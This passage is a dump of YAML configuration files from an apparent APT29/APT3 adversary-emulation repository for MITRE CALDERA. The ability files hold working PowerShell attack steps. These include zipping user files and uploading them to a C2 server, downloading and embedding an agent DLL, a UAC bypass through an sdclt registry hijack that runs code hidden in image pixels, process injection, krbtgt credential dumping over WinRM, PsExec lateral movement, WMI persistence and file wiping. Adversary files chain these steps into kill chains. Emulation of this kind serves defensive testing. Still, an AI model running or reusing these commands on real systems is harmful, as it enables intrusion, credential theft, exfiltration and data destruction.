Exfiltration over C2 Channel (T1041) 4 | description: Copy a target file from a remote file share through the existing C2 channel 5 | tactic: exfiltration 6 | technique: 7 | attack_id: T1041 8 | name: Exfiltration Over Command and Control Channel 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | Import-Module .\upload.ps1 -Verbose -Force; 14 | Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\AppData\Roaming\Draft.zip" -Uri "#{server}/file/upload"; 15 | payload: upload.ps1 16 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/exfiltration/a612311d-a802-48da-bb7f-88a4b9dd7a24.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: a612311d-a802-48da-bb7f-88a4b9dd7a24 4 | name: 7.B - Data from staged file (T1074) and Exfiltration over C2 Channel (T1041) 5 | description: Compress all data within Download directory and exfiltrate the results. 6 | tactic: exfiltration 7 | technique: 8 | attack_id: T1041 9 | name: Exfiltration Over Command and Control Channel 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | 15 | Write-Host "[*] Compressing all the things in download dir"; 16 | Compress-Archive -Path "C:\Users\#{profile_user}\Downloads\*.*" -Force -DestinationPath "$env:APPDATA\OfficeSupplies.zip"; 17 | 18 | Import-Module .\upload.ps1 -Verbose -Force; 19 | Invoke-MultipartFormDataUpload -InFile "$env:APPDATA\OfficeSupplies.zip" -Uri "#{server}/file/upload"; 20 | if ($?) { 21 | write-host "[+] Data exfil of download directory completed!"; 22 | } else { 23 | write-host "[!] Data exfil failed!"; 24 | } 25 | 26 | payload: upload.ps1 27 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/host-provision/865b6ad9-ba59-435a-bd8f-641052fc077a.yml: -------------------------------------------------------------------------------- 1 | - id: 865b6ad9-ba59-435a-bd8f-641052fc077a 2 | name: Host provisioning ability for APT29 Day2 setup 3 | description: Download Sandcat DLL and craft payload 4 | tactic: host-provision 5 | technique: 6 | attack_id: T0000 7 | name: Host Provisioning 8 | platforms: 9 | windows: 10 | psh,pwsh: 11 | timeout: 300 12 | command: | 13 | @("schemas.ps1","make_lnk.ps1","2016_United_States_presidential_election_-_Wikipedia.html") | Move-Item -Force -Destination "C:\Users\#{profile_user_day2}\Desktop"; 14 | Move-Item -Force -Path .\MITRE-ATTACK-EVALS.HTML -Destination "C:\Users\#{profile_user_day2}\Documents"; 15 | Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop"; 16 | 17 | $url="#{server}/file/download"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $wc.Headers.add("group","red-dll"); $wc.Headers.add("server","#{server}"); while($true) {try {if(($data=$wc.DownloadData($url)) -and ($name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")) -and -not ([io.file]::WriteAllBytes("C:\\Users\\Public\\$name.dll",$data))) {break}} catch{sleep 60}}; 18 | 19 | if(Test-Path -LiteralPath "C:\Users\#{profile_user_day2}\Desktop\blob"){ 20 | Remove-Item "C:\Users\#{profile_user_day2}\Desktop\blob" -Force; 21 | Write-Host "Removed old blob file"; 22 | } 23 | 24 | Set-ItemProperty -Path schemas.ps1 -Name IsReadOnly -Value $false; 25 | Set-ItemProperty -Path 2016_United_States_presidential_election_-_Wikipedia.html -Name IsReadOnly -Value $false; 26 | 27 | certutil -encode "C:\Users\Public\$name.dll" blob; 28 | 29 | (Get-Content .\blob) -join "" | Out-File -NoNewline -FilePath .\blob; 30 | $blob = ((Get-Content .\blob) -join "") -replace "`r|`n",""; 31 | 32 | (Get-Content schemas.ps1) -replace '\$bin = ""',"`$bin = `"$($blob)`"" | Out-File -FilePath .\schemas.ps1; 33 | 34 | powershell .\make_lnk.ps1; 35 | 36 | cleanup: | 37 | @("schemas.ps1","make_lnk.ps1","2016_United_States_presidential_election_-_Wikipedia.html","blob") | Remove-Item -Force -Destination "C:\Users\#{profile_user_day2}\Desktop"; 38 | Remove-Item -Force -Destination "C:\Users\Public\$name.dll"; 39 | 40 | payload: schemas.ps1,make_lnk.ps1,2016_United_States_presidential_election_-_Wikipedia.html,MITRE-ATTACK-EVALS.HTML 41 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/impact/4b2e9574-b1a7-4b38-95b2-6054ded9c4fe.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe 4 | name: 10.A.2 – Scheduled Task (T1053) from 7.C 5 | description: Reboot the machine to aid in peristence callbacks 6 | tactic: impact 7 | technique: 8 | attack_id: T1529 9 | name: System Shutdown/Reboot 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | write-host "[*] Restarting Computer"; 15 | Restart-Computer -Force; 16 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/impact/f820b93d-6176-4a72-a138-a70b0b549c49.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: f820b93d-6176-4a72-a138-a70b0b549c49 4 | name: 19.A - Data Wiping of staged files 5 | description: Securely delete previously staged files. 6 | tactic: impact 7 | technique: 8 | attack_id: T1488 9 | name: Disk Content Wipe 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | . .\wipe.ps1; 15 | wipe "m.exe"; 16 | wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"; 17 | wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"; 18 | payload: wipe.ps1 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/lateral-movement/00446217-53ca-4749-bacd-f41fe189d36e.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 00446217-53ca-4749-bacd-f41fe189d36e 3 | name: 10.B - Startup Folder Persistence Execution 4 | description: Sets credentials for a headless RDP session to spawn triggering startup folder persistence. 5 | tactic: lateral-movement 6 | technique: 7 | attack_id: T1060, T1106, T1134 8 | name: Remote Desktop Protocol 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | cmdkey /add:127.0.0.2 /user:#{profile_user} /pass:#{profile_user_password}; 14 | mstsc /v:127.0.0.2; 15 | sleep 10; 16 | Get-Process -name mstsc; 17 | if ($?) { taskkill.exe /F /IM mstsc.exe; exit 0; } else {exit 1;} 18 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/lateral-movement/acecc8f7-18c2-41fd-87bc-39ffd644e4e9.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: acecc8f7-18c2-41fd-87bc-39ffd644e4e9 3 | name: 16.C/D - Remote Connection (T1028) & Remote File Copy (T1105) & Credential Dumping 4 | description: Establish connection to Domain Controller 5 | tactic: lateral-movement 6 | technique: 7 | attack_id: T1105 8 | name: Remote File Copy 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | . .\invoke-winrmsession.ps1; 14 | $session = invoke-winrmsession -Username "#{target.winrm.username}" -Password "#{target.winrm.password}" -IPAddress "#{target.winrm.remote_host}"; 15 | Copy-Item m.exe -Destination "C:\Windows\System32\\" -ToSession $session -force; 16 | if ($?) { 17 | write-host "[+] Successfully copied m.exe to remote host"; 18 | } else { 19 | write-host "[!] Error, copying and executing m.exe on remote host"; 20 | } 21 | Invoke-Command -Session $session -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string 22 | 23 | payload: invoke-winrmsession.ps1,m.exe 24 | parsers: 25 | plugins.evals.app.parsers.ntlm: 26 | - source: target.ntlm 27 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/lateral-movement/bddc0abc-07a0-41b7-813f-e0c64d9226b3.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: bddc0abc-07a0-41b7-813f-e0c64d9226b3 3 | name: 8.B Copy Sandcat File 4 | description: Copy Sandcat file using PsExec 5 | tactic: lateral-movement 6 | technique: 7 | attack_id: T1105 8 | name: Remote File Copy 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | command: | 13 | move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force; 14 | set-location "C:\Program Files\SysinternalsSuite\"; 15 | .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}"; 16 | tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe"; 17 | payload: sandcat.go-windows-upx 18 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/persistence/43aad2d6-d16a-4adb-aa2b-9510a3be4c52.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 43aad2d6-d16a-4adb-aa2b-9510a3be4c52 4 | name: 15.A - WMI Persistence technique 5 | description: user triage 6 | tactic: persistence 7 | technique: 8 | attack_id: T1084 9 | name: Windows Management Instrumentation Event Subscription 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | Get-WmiObject -Namespace "root/subscription" -list | findstr /i "__Filter"; 15 | if ($?) { 16 | write-host "[*] WMI script has already executed on this machine. Not loading and executing wmi script."; 17 | exit 1; 18 | } else { 19 | . .\stepFifteen_wmi.ps1; 20 | wmi; 21 | if ($?) { 22 | write-host "[+] WMI script has successfully executed!"; 23 | exit 0; 24 | } 25 | exit 1; 26 | } 27 | payload: stepFifteen_wmi.ps1 28 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/persistence/45f18b58-c14f-4b61-a3da-41b67af21429.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 45f18b58-c14f-4b61-a3da-41b67af21429 4 | name: 5.B - Persistent Service - 2 5 | description: Leverage modified Sysinternals 6 | tactic: persistence 7 | technique: 8 | attack_id: T1023 9 | name: Shortcut Modification 10 | platforms: 11 | windows: 12 | psh, pshw: 13 | command: | 14 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 15 | if (Test-Path -path "readme.ps1") { 16 | . .\readme.ps1; 17 | Invoke-Persistence -PersistStep 2; 18 | write-host "[+] Persistence 2 invoked."; 19 | 20 | } else { 21 | write-host "[!] readme.ps1 not found."; 22 | return 1; 23 | } 24 | 25 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/persistence/9c75155e-21ab-4471-af16-45f3795a313c.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 9c75155e-21ab-4471-af16-45f3795a313c 4 | name: 5.A - Persistent Service - 1 5 | description: Leverage modified Sysinternals 6 | tactic: persistence 7 | technique: 8 | attack_id: T1023 9 | name: Shortcut Modification 10 | platforms: 11 | windows: 12 | psh, pshw: 13 | command: | 14 | Set-Location -path "C:\Program Files\SysinternalsSuite"; 15 | if (get-service -name "javamtsup" -ErrorAction SilentlyContinue) { 16 | write-host "[*] Service already exists...Not running persistence step-1"; 17 | exit 1; 18 | } 19 | 20 | if (Test-Path -path "readme.ps1") { 21 | . .\readme.ps1; 22 | Invoke-Persistence -PersistStep 1; 23 | write-host "[+] Persistence 1 invoked."; 24 | exit 0; 25 | 26 | } else { 27 | write-host "[!] readme.ps1 not found."; 28 | exit 1; 29 | } 30 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/persistence/afb8d8f7-d059-4825-95ae-c5727e2db320.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: afb8d8f7-d059-4825-95ae-c5727e2db320 3 | name: 20.B - Triggering Persistent 4 | description: Trigger RegKey persistence by rebooting the machine 5 | tactic: persistence 6 | technique: 7 | attack_id: T1085 8 | name: Rundll32 9 | platforms: 10 | windows: 11 | psh, pshw: 12 | command: | 13 | Restart-Computer -Force; 14 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/privilege-escalation/088b8639-3f37-42cc-9dc8-01aabb645461.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 088b8639-3f37-42cc-9dc8-01aabb645461 4 | name: >- 5 | 3.B.1 - Process Discovery (T1057), 6 | 3.C.1 - Process Injection (T1055) 7 | description: The limited functionality high-integrity RAT will inject malicious code into an existing fully functional high-integrity process, resulting in a new elevated, fully functional high-integrity RAT. 8 | tactic: privilege-escalation 9 | technique: 10 | attack_id: T1055 11 | name: Process Injection (T1055) 12 | platforms: 13 | windows: 14 | psh,pwsh: 15 | command: | 16 | Import-Module .\Invoke-PSInject.ps1 -Verbose -Force; 17 | Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; 18 | $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); 19 | Inject -PoshCode $pcode; 20 | payload: update.ps1,Invoke-PSInject.ps1 -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/privilege-escalation/1345bff7-6f26-43b2-a92a-9aabccdb3db0.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 1345bff7-6f26-43b2-a92a-9aabccdb3db0 4 | name: 3.A.1 - Bypass User Account Control (T1088) 5 | description: A UAC bypass technique is executed to steal the token of an existing high-integrity process and launch a new, high-integrity RAT with limited functionality. 6 | tactic: privilege-escalation 7 | technique: 8 | attack_id: T1088 9 | name: Bypass User Account Control (T1088) via Access Token Manipulation (T1134) 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force; 15 | Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; 16 | $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); 17 | Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose 18 | payload: update.ps1,Invoke-BypassUACTokenManipulation.ps1 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/privilege-escalation/89e9dffa-8836-4672-8cf3-bebd006d2a2b.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | - id: 89e9dffa-8836-4672-8cf3-bebd006d2a2b 4 | name: 3.B - UAC Bypass via Backup Utility 5 | description: Modify registry values of sdclt to bypass UAC 6 | tactic: privilege-escalation 7 | technique: 8 | attack_id: T1088 9 | name: Bypass User Account Control 10 | platforms: 11 | windows: 12 | psh,pwsh: 13 | command: | 14 | if (!(test-path -path $env:windir\system32\sdclt.exe)) { 15 | write-host "[!] sdclt.exe was not found on this host."; 16 | exit 1; 17 | } 18 | New-Item -Path HKCU:\Software\Classes -Name Folder -Force; 19 | New-Item -Path HKCU:\Software\Classes\Folder -Name shell -Force; 20 | New-Item -Path HKCU:\Software\Classes\Folder\shell -Name open -Force; 21 | New-Item -Path HKCU:\Software\Classes\Folder\shell\open -Name command -Force; 22 | 23 | $username="#{profile_user}"; 24 | $payload='powershell.exe -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName "System.Drawing"; $g=a System.Drawing.Bitmap("C:\Users\$($username)\Downloads\monkey.png");$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"'; 25 | 26 | Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "(Default)" -Value $payload -Force; 27 | Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" -Value "" -Force; 28 | 29 | cmd.exe /c sdclt.exe; 30 | cmd.exe /c powershell.exe; 31 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/stage-capabilities/4f7d21c9-ea31-4943-ad8a-efbbeeccdd7d.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - id: 4f7d21c9-ea31-4943-ad8a-efbbeeccdd7d 3 | name: 4.A - Planting Modified Sysinternals Utilities 4 | description: Uploading payloads masquerading as via modified SysInternalsSuite 5 | tactic: stage-capabilities 6 | technique: 7 | attack_id: T1362 8 | name: Upload, install, and configure software/tools 9 | platforms: 10 | windows: 11 | psh,pwsh: 12 | timeout: 300 13 | command: | 14 | 15 | iwr -uri "https://download.sysinternals.com/files/SysinternalsSuite.zip" -outfile SysInternalsSuite.zip; 16 | Expand-Archive -Path SysInternalsSuite.zip -DestinationPath "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -Force; 17 | 18 | if (! $?) { 19 | write-host "Error moving files to #{profile_user}\Downloads"; 20 | exit 1; 21 | } 22 | 23 | Move-Item Modified-SysInternalsSuite.zip "C:\Users\#{profile_user}\Downloads" -Force; 24 | Expand-Archive -LiteralPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -DestinationPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -Force; 25 | 26 | if (! $?) { 27 | write-host "Error expanding files to #{profile_user}\Downloads"; 28 | exit 1; 29 | } 30 | 31 | $dir_exists=Test-Path -path "C:\Program Files\SysInternalsSuite"; 32 | if ($dir_exists -eq $true) { 33 | write-host "[*] SysInternalsSuite folder exists within \"C:\Program Files\", copying over payloads then removing folder from Downloads."; 34 | Move-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; 35 | Move-Item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; 36 | } else { 37 | mkdir "C:\Program Files\SysInternalsSuite"; 38 | Copy-Item -Path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; 39 | Copy-Item -Path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; 40 | } 41 | 42 | if (test-path -path "SysInternalsSuite.zip") { 43 | Remove-Item -path "filesystem::SysInternalsSuite.zip" -force; 44 | } 45 | 46 | if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" ) { 47 | remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -force; 48 | } 49 | 50 | if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite") { 51 | remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -recurse -force; 52 | } 53 | 54 | if (test-path -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite") { 55 | Remove-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -recurse -force; 56 | } 57 | 58 | Set-Location -path "C:\Program Files\SysInternalsSuite"; 59 | if ($?) { 60 | gci; 61 | write-host "[*] Successfully planted files" 62 | } else { 63 | write-host "[!] Error downloading and planting modified system tools." 64 | } 65 | 66 | payload: Modified-SysInternalsSuite.zip 67 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/148c819b-b022-43cb-a25c-3f6f5c71318d.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: 148c819b-b022-43cb-a25c-3f6f5c71318d 4 | name: ATT&CK Eval APT3 - 8.D-9.B 5 | description: Collection and Exfiltration 6 | visible: 1 7 | phases: 8 | 1: 9 | - 0b1841bd-ef8b-475c-bce7-8fcb2860984a 10 | 2: 11 | - d5170a60-3bdc-44e0-9870-a38db5c0cf81 12 | - 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6 13 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/3af0e59b-0d2a-48cd-b934-c46d5d1621d6.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: 3af0e59b-0d2a-48cd-b934-c46d5d1621d6 4 | name: ATT&CK Eval APT3 - 5.B-8.A 5 | description: Access Token Manipulation, Discovery for Lateral Movement, Persistence, and Discovery for Collection 6 | visible: 1 7 | phases: 8 | 1: 9 | - 03afada1-1714-408f-bde5-f528b91dc89d -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/6dc5b558-c7bd-4835-860b-50e003399f8d.yml: -------------------------------------------------------------------------------- 1 | description: MITRE Evals APT-29 kill chain execution day 2.A 2 | id: 6dc5b558-c7bd-4835-860b-50e003399f8d 3 | name: ATT&CK Eval APT29 - Day 2 4 | visible: 1 5 | phases: 6 | 1: #Setup 7 | - 865b6ad9-ba59-435a-bd8f-641052fc077a 8 | 9 | 2: # day 2 - 11 10 | - e506f811-884d-4992-aacb-514b33a0324f # .lnk payload 11 | 12 | 3: # day 2 - 12 13 | - 4a2ad84e-a93a-4b2e-b1f0-c354d6a41278 # Timestomp 14 | - f9c0b150-822f-497b-ad6d-187f24561e9a # DetectAV 15 | - 2b5a72b1-01e4-48ae-98b0-2570a7894371 # Detect Software 16 | 17 | 4: # day 2 - 13 18 | - 0cfadbcb-ec21-44ae-adb7-9a23176dd620 # comp 19 | - 96140694-6d13-40b6-9553-0e63533469f3 # domain 20 | - f320eebd-e75b-4194-b529-79e64ad0b9ee # user triage 21 | - a34ab8f2-a106-41fb-af0b-cf5382bd18ae # pslist 22 | 23 | 5: # day 2 - 14 24 | - 5226e5dc-fc28-43b7-a679-0db49d520402 # stdctl UAC bypass 25 | - 1dba454c-0e4f-4fe0-8bc9-b17e8c5c9a24 # Staging m.exe 26 | - 4ef6009d-2d62-4bb4-8de9-0458df2e9567 # Dumping credentials via wmidump (Mimikatz) 27 | 28 | 6: # day 2 - 15 29 | - 43aad2d6-d16a-4adb-aa2b-9510a3be4c52 # WMI persistence technique 30 | 31 | 7: # day 2 - 16 32 | - 1c8552c7-f7ed-4523-b640-72d65af5f855 # Enumerate Domain Controller 33 | - a42be479-fc26-4d7c-9e63-7a9b74e4c8d2 # Enumerate Domain SID 34 | - acecc8f7-18c2-41fd-87bc-39ffd644e4e9 # Copy winrm to remote host 35 | 36 | 8: # day 2 - 17 37 | - b1dcc53a-c86c-46ba-8a3d-e1da74a8db3c # Email collection 38 | - fc231955-774f-442c-ac0e-e74dfda50c5c # Document collection 39 | 40 | 9: # day 2 - 18 41 | - 4840d6dd-da13-401a-be46-05db56f4e1e0 # Mount netshare for exfil 42 | 43 | 10: # day 2 - 19 44 | - f820b93d-6176-4a72-a138-a70b0b549c49 # Data Wiping 45 | 46 | 11: # day 2 - 20A 47 | - 267bad86-3f06-49f1-9a3e-6522f2a61e7a # Cred/Ticket Collection 48 | 49 | 12: # day 2 - 20B 50 | - afb8d8f7-d059-4825-95ae-c5727e2db320 # Restart to trigger persistance 51 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/7916aaa3-f05d-453a-b632-f0f73b0865ce.yml: -------------------------------------------------------------------------------- 1 | description: MITRE Evals APT-29 kill chain execution for day 1.B - lateral movement 2 | id: 7916aaa3-f05d-453a-b632-f0f73b0865ce 3 | name: ATT&CK Eval APT29 - Day 1.B - Lateral Movement 4 | visible: 1 5 | phases: 6 | 1: 7 | - 08e57385-dbce-4850-8bb7-589ef79465ab # PowerShell collection 8 | 9 | 2: 10 | - 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6 # File upload 11 | 12 | 3: 13 | - 208b021b-c79a-4176-8ad1-3af99ed50c6f # Artifact cleanup, break out username into fact after testing 14 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/80e9c544-c5ea-423d-b4f3-c0de3c2947ba.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: 80e9c544-c5ea-423d-b4f3-c0de3c2947ba 4 | name: ATT&CK Eval APT3 - 2-3.A 5 | description: Initial Discovery and Privilege Escalation 6 | visible: 1 7 | phases: 8 | 1: 9 | - ee08a427-1e1d-4d8a-aeb1-978a7fcf9087 10 | - 64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce 11 | 2: 12 | - 35d95b64-c1f8-4ac7-a2f2-8959218239cd 13 | 3: 14 | - 5df12481-9d8c-4235-b550-9cefc8ed7361 15 | - 41610306-087c-4c34-874b-37b8ed633a36 16 | 4: 17 | - 2ff877b4-0c00-401e-9d3f-070c70b610df 18 | - 144b1384-5060-494f-80eb-91772695cdf3 19 | 5: 20 | - d2ea2676-7f85-4228-b980-ab3c0e1adc03 21 | - 7c2a6e5b-1adb-464f-a581-4677391f8dd6 22 | 6: 23 | - faa96e7f-081a-40b7-a743-a6a7f2627ea3 24 | - 26181249-be75-41ed-9fe7-5c30ea8c2d4d 25 | - 84377d7a-0363-44fd-a082-44657ca1858f 26 | 7: 27 | - 61221fb9-cb32-46d5-98fd-90567a621526 28 | - 9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76 29 | 8: 30 | - 5c23f638-9cfc-4fc4-9cab-4af628fef70a 31 | 9: 32 | - 1345bff7-6f26-43b2-a92a-9aabccdb3db0 -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/842d1d8e-a49d-4f11-9e97-79ce9d2f1732.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: 842d1d8e-a49d-4f11-9e97-79ce9d2f1732 4 | name: ATT&CK Eval APT3 - 3.B-3.C 5 | description: Privilege Escalation 6 | visible: 1 7 | phases: 8 | 1: 9 | - 088b8639-3f37-42cc-9dc8-01aabb645461 -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/c9b6f5d3-ebde-4df1-9c15-ce1f339170c7.yml: -------------------------------------------------------------------------------- 1 | --- 2 | 3 | id: c9b6f5d3-ebde-4df1-9c15-ce1f339170c7 4 | name: ATT&CK Eval APT3 - 4-5.A 5 | description: Discovery for Lateral Movement and Credential Access 6 | visible: 1 7 | phases: 8 | 1: 9 | - 59592c35-8207-4896-8d8b-36ad4600245d 10 | - 24ed020e-4730-4000-b6b4-6b5d3e95314f 11 | 2: 12 | - 5f4263c4-7ff1-4098-b5f5-f41faa31cf5b 13 | 3: 14 | - ba0b398d-91b8-490a-bed2-f959afa8e1aa 15 | 4: 16 | - 4ef6009d-2d62-4bb4-8de9-0458df2e9567 17 | 5: 18 | - effbedc1-1bc8-4a75-9395-980559700008 -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/data/adversaries/d6115456-604a-4707-b30e-079dec5aad53.yml: -------------------------------------------------------------------------------- 1 | description: MITRE Evals APT-29 kill chain execution day 1.A 2 | id: d6115456-604a-4707-b30e-079dec5aad53 3 | name: ATT&CK Eval APT29 - Day 1.A 4 | visible: 1 5 | phases: 6 | 1: 7 | - 571845f6-b75c-4b9d-a666-a78f7827261f # RTLO execution 8 | 2: 9 | - a5daa530-c640-49bc-aa54-6808789a684a # Powershell Spawning 10 | - 5692da31-3586-4e4f-8f07-5750070c730b # PowerShell Collection 11 | 3: 12 | - 68e209dd-f354-4adc-8bc6-e85a3e55a7f4 # Exfiltration 13 | 14 | 4: 15 | - 68b588bc-002a-42dc-bac7-9189f944065b # Download monkey.png 16 | 17 | 5: 18 | - 89e9dffa-8836-4672-8cf3-bebd006d2a2b # Setup UAC Bypass to execute Monkey.png 19 | 6: 20 | - 5ff80022-8d85-410b-b868-6c7565b267e5 # Cleanup registry keys 21 | 22 | 7: 23 | - 4f7d21c9-ea31-4943-ad8a-efbbeeccdd7d # Download modified Sysinternals 24 | 25 | 8: 26 | - 646be6c9-f27a-4f5f-be5d-b8a0317e215f # Clean up process 27 | - 9b5b5aec-32ff-4d74-8555-727b50ab15f6 # Delete on disk files 28 | 29 | 9: 30 | - 6f1f4768-7099-45d2-a858-b49dc792234e # Load Stage 2 and perform discovery 31 | 32 | 10: 33 | - 9c75155e-21ab-4471-af16-45f3795a313c # Run persistence step one 34 | 35 | 11: 36 | - 45f18b58-c14f-4b61-a3da-41b67af21429 # Run persistence step two 37 | 38 | 12: 39 | - e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d # Dump chrome creds w/ accesschk 40 | 41 | 13: 42 | - c4f4b13c-87b6-498c-b814-93570173068c # Search for Private Keys 43 | 44 | 14: 45 | - a4b14c10-49aa-4ae4-b165-d5a37364fe62 # Rename psversion.txt to psversion.ps1 46 | 47 | 15: 48 | - a81ea4ad-bc9f-49a7-82d4-4466df641487 # Grab screenshot 49 | - ee4c2eab-be57-434c-a32c-14b77360301a # Grab clipboard 50 | - db28f68d-e8b8-46e6-b680-642570d4b257 # Grab keystrokes 51 | 52 | 16: 53 | - a612311d-a802-48da-bb7f-88a4b9dd7a24 # Exfiltrate data 54 | 55 | 17: 56 | - 95564347-e77a-4a89-b08f-dcafa5468f2c # Remote System Discovery 57 | - c4a59e39-53b0-4ace-9528-8ff052752ece # PowerShell system discovery of users on other machines 58 | 59 | 18: 60 | - bddc0abc-07a0-41b7-813f-e0c64d9226b3 # PsExec and execute Sandcat 61 | 62 | 19: 63 | - 00446217-53ca-4749-bacd-f41fe189d36e # RDP to trigger startup folder persistence 64 | 65 | 20: 66 | - 4bedbd9b-a570-4f9f-b78a-2f7f99ad5e92 # Clean up artifacts 67 | 68 | 21: 69 | - 